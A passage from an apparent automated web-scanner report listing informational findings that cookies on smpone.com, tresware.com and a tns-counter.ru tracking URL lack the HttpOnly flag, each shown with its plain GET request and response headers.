Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733881; expires=Mon, 25-Apr-2011 12:28:01 GMT; path=/
Content-Type: text/html
Content-Length: 12154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...

16.194. http://www.smpone.com/Sections-read-20.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-20.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-20.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.2.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733869

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:55 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733875; expires=Mon, 25-Apr-2011 12:27:55 GMT; path=/
Content-Type: text/html
Content-Length: 12151

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Services</title>
<meta http-equiv="Content-T
...[SNIP]...

16.195. http://www.smpone.com/Sections-read-21.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-21.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-21.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-20.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.19.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733968

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733974; expires=Mon, 25-Apr-2011 12:29:34 GMT; path=/
Content-Type: text/html
Content-Length: 12723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Network Assessment</title>
<meta http-equiv=
...[SNIP]...

16.196. http://www.smpone.com/Sections-read-29.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-29.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-29.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.5.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733882

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733884; expires=Mon, 25-Apr-2011 12:28:04 GMT; path=/
Content-Type: text/html
Content-Length: 12851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Digital Forensics</title>
<meta http-equiv="
...[SNIP]...

16.197. http://www.smpone.com/Sections-read-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-3.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-3.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.11.10.1303732845; PHPSESSID=b07217b91d15829f50a400a4c700d48f; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733904

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733931; expires=Mon, 25-Apr-2011 12:28:51 GMT; path=/
Content-Type: text/html
Content-Length: 13520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Directions</title>
<meta http-equiv="Content
...[SNIP]...

16.198. http://www.smpone.com/Sections-read-30.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-30.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-30.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.14.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733938

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733947; expires=Mon, 25-Apr-2011 12:29:07 GMT; path=/
Content-Type: text/html
Content-Length: 12409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Industries</title>
<meta http-equiv="Content
...[SNIP]...

16.199. http://www.smpone.com/Sections-read-7.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-7.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-7.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.6.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733885

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733887; expires=Mon, 25-Apr-2011 12:28:07 GMT; path=/
Content-Type: text/html
Content-Length: 13924

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Risk Assess
...[SNIP]...

16.200. http://www.smpone.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Static-contact.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Static-contact.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-126.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733897

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 14568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Contact Inf
...[SNIP]...

16.201. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tns-counter.ru
Path:   /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388 HTTP/1.1
Host: www.tns-counter.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: tns-counter.0.5.3
Date: Mon, 25 Apr 2011 14:20:23 GMT
Content-Type: image/gif
Content-Length: 43
Location: http://www.tns-counter.ru/V13b***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache=Set-Cookie, max-age=0, proxy-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Set-Cookie: guid=CB6401004DB58327X1303741223; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

GIF89a.............!.......,...........L..;

16.202. http://www.tresware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=b8637d1e5bc7394c963fe8caf8da98b0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 15860

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Website Development | Web Content Management | CMS | Web Design | New Jers
...[SNIP]...

16.203. http://www.tresware.com/CustomPHPProgrammingNJ.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /CustomPHPProgrammingNJ.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CustomPHPProgrammingNJ.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900; igyi[s]=885141303733914696

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733986; expires=Mon, 25-Apr-2011 12:29:46 GMT; path=/
Content-Type: text/html
Content-Length: 14485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Custom PHP Programming | Website PHP Development | Custom PHP Development
...[SNIP]...

16.204. http://www.tresware.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /Static-contact.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Static-contact.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/webcontentmanagementNJ.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733993

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303734004; expires=Mon, 25-Apr-2011 12:30:04 GMT; path=/
Content-Type: text/html
Content-Length: 23772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
